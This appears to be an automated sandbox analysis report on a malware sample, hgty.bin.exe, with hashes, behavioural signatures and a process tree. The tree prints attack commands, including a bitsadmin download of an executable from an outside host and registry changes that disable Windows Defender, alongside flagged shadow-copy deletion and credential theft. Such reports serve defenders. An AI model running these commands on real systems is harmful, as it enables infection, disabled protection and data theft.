Analysis
- max time kernel: 138s
- max time network: 141s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 28-10-2021 16:34
Static task: static1
Behavioral task: behavioral1 (Sample: hgty.bin.exe, Resource: win7-en-20210920)
Behavioral task: behavioral2 (Sample: hgty.bin.exe, Resource: win10-en-20210920)
General
- Target: hgty.bin.exe
- Size: 1.6MB
- MD5: 97b1b0eb2864514c1bd17dc2479fd392
- SHA1: 1e0db2c33bac2abf8cf5883f779b0fb34e63d7c7
- SHA256: 7bd1800901f644312525102786765942f63e164618b076d1e9c7d77e8c055e19
- SHA512: c1940f8b49298f37e2fe23f2ac1fdb35144f09f77d4d58da96f748c78bac2f56f0b90dc19faf02c1a8d3d9992a1b34bb2d2c7c7ec71eab304151c3c843edbc59
Malware Config
Extracted
http://xuiklxus.xyz/hfile.bin
Signatures
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | reg.exe
Modifies security service 2 TTPs 4 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | reg.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
18 | 364 | powershell.exe
Downloads MZ/PE file
Executes dropped EXE 64 IoCs
Processes:
pid | process
3628 | hgty.bin.tmp
1760 | 7za.exe
3852 | kernel32.exe
1452 | kernel32.exe
1288 | kernel32.exe
2496 | kernel32.exe
1300 | kernel32.exe
1584 | kernel32.exe
328 | kernel32.exe
192 | kernel32.exe
2308 | kernel32.exe
2244 | kernel32.exe
4012 | kernel32.exe
3632 | kernel32.exe
2744 | kernel32.exe
1516 | kernel32.exe
3580 | kernel32.exe
1732 | kernel32.exe
1020 | kernel32.exe
2224 | kernel32.exe
660 | kernel32.exe
1876 | kernel32.exe
3584 | kernel32.exe
876 | kernel32.exe
1456 | kernel32.exe
360 | kernel32.exe
1616 | kernel32.exe
1980 | kernel32.exe
2296 | kernel32.exe
2376 | kernel32.exe
2636 | kernel32.exe
2320 | kernel32.exe
1604 |
2208 | kernel32.exe
916 | kernel32.exe
688 | kernel32.exe
2744 | kernel32.exe
1608 | kernel32.exe
1516 | kernel32.exe
3924 | kernel32.exe
3940 | kernel32.exe
1416 | kernel32.exe
2176 | kernel32.exe
3592 | kernel32.exe
3604 | kernel32.exe
1264 | kernel32.exe
2080 | kernel32.exe
2020 | kernel32.exe
4080 | kernel32.exe
3284 | kernel32.exe
2812 | 7za.exe
3768 | 7za.exe
2928 | 7za.exe
1252 | 7za.exe
3424 | 7za.exe
3772 | 7za.exe
3756 | 7za.exe
1400 | 7za.exe
4012 | 7za.exe
1884 | 7za.exe
200 | 7za.exe
1676 | 7za.exe
408 | eDbwCBj.exe
3792 | Nemica.exe.com
Loads dropped DLL 1 IoCs
Processes:
pid | process
3628 | hgty.bin.tmp
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | eDbwCBj.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | eDbwCBj.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 2868 set thread context of 2564 | 2868 | Nemica.exe.com | RegAsm.exe
Drops file in Program Files directory 1 IoCs
Processes:
description | ioc | process
File created | C:\Program Files (x86)\is-12QT7.tmp | hgty.bin.tmp
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Delays execution with timeout.exe 2 IoCs
Processes:
pid | process
1036 | timeout.exe
3252 | timeout.exe
Download via BitsAdmin 1 TTPs 1 IoCs
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid | process
3100 | vssadmin.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | kernel32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | kernel32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | kernel32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" |
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" |
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" |
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" |
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | kernel32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ |
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | kernel32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | kernel32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | kernel32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | kernel32.exe
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings | cmd.exe
Runs ping.exe 1 TTPs 64 IoCs
Processes:
pid | process
process: PING.EXE (64 entries); pids, in order: 3792, 3228, 1184, 1500, 3924, 2404, 3192, 1304, 2060, 3500, 1616, 1092, 1452, 188, 3584, 2224, 200, 824, 3492, 4040, 184, 1604, 1452, 1220, 3116, 3080, 3092, 1220, 4076, 1304, 3940, 2380, 1032, 1992, 2420, 1512, 1348, 324, 2744, 4076, 2084, 3424, 3500, 2564, 2032, 2648, 3772, 824, 1040, 188, 1040, 3020, 3416, 3484, 1720, 1264, 628, 2564, 1084, 2376, 364, 1608, 628, 2336
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process (count of identical consecutive entries in parentheses)
3628 | hgty.bin.tmp (x2)
364 | powershell.exe (x3)
3852 | kernel32.exe (x4)
1452 | kernel32.exe (x2)
1288 | kernel32.exe (x2)
1452 | kernel32.exe (x2)
1288 | kernel32.exe (x2)
1300 | kernel32.exe (x4)
1584 | kernel32.exe (x4)
192 | kernel32.exe (x4)
2308 | kernel32.exe (x4)
4012 | kernel32.exe (x4)
3632 | reg.exe (x4)
1516 | kernel32.exe (x4)
3580 | kernel32.exe (x4)
1020 | kernel32.exe (x4)
2224 | kernel32.exe (x4)
1876 | kernel32.exe (x4)
3584 | kernel32.exe (x3)
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid | process
636 |
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
pid | process | description (Token: ..., one entry per token, in order)
364 | powershell.exe | SeDebugPrivilege
3852 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
1452 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
1288 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
1300 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
1584 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
192 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
2308 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
4012 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
3632 | reg.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
1516 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
3580 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
1020 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
2224 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
1876 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
3584 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
1456 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
360 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
1980 | kernel32.exe | SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
pid | process (count of identical consecutive entries in parentheses)
3628 | hgty.bin.tmp
3792 | Nemica.exe.com (x3)
2868 | Nemica.exe.com (x3)
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
pid | process (count of identical consecutive entries in parentheses)
3792 | Nemica.exe.com (x3)
2868 | Nemica.exe.com (x3)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process (count of identical consecutive entries in parentheses)
PID 2784 wrote to memory of 3628 | 2784 | hgty.bin.exe | hgty.bin.tmp (x3)
PID 3628 wrote to memory of 592 | 3628 | hgty.bin.tmp | cmd.exe (x3)
PID 3628 wrote to memory of 820 | 3628 | hgty.bin.tmp | cmd.exe (x3)
PID 592 wrote to memory of 3420 | 592 | cmd.exe | bitsadmin.exe (x3)
PID 820 wrote to memory of 364 | 820 | cmd.exe | powershell.exe (x3)
PID 592 wrote to memory of 1684 | 592 | cmd.exe | wlanext32.exe (x2)
PID 592 wrote to memory of 1872 | 592 | cmd.exe | attrib.exe (x3)
PID 1684 wrote to memory of 2880 | 1684 | wlanext32.exe | cmd.exe (x2)
PID 592 wrote to memory of 188 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 3500 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 1148 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 1452 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 3676 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 3940 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 412 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 1040 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 2564 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 1296 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 1468 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 1616 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 1720 | 592 | cmd.exe | PING.EXE (x3)
PID 592 wrote to memory of 2032 | 592 | cmd.exe | PING.EXE (x3)
Views/modifies file attributes 1 TTPs 1 IoCs
Processes (tree depth in brackets, then image path and command line; signatures listed beneath each process)
[1] C:\Users\Admin\AppData\Local\Temp\hgty.bin.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\hgty.bin.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\is-EBC1H.tmp\hgty.bin.tmp  cmd: "C:\Users\Admin\AppData\Local\Temp\is-EBC1H.tmp\hgty.bin.tmp" /SL5="$50062,1023751,780800,C:\Users\Admin\AppData\Local\Temp\hgty.bin.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe  cmd: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\bitsadmin.exe  cmd: bitsadmin /transfer Explorers /download /priority FOREGROUND http://xuiklxus.xyz/wlanext32.exe C:\Users\Admin\AppData\Local\Temp\wlanext32.exe
          - Download via BitsAdmin
      [4] C:\Users\Admin\AppData\Local\Temp\wlanext32.exe  cmd: wlanext32.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\cmd.exe  cmd: C:\Windows\system32\cmd.exe /c pause
      [4] C:\Windows\SysWOW64\attrib.exe  cmd: ATTRIB +h wlanext32.exe
          - Views/modifies file attributes
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 3 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
          - Runs ping.exe
      [4] C:\Windows\SysWOW64\PING.EXE  cmd: Ping -n 1 127.0.0.1
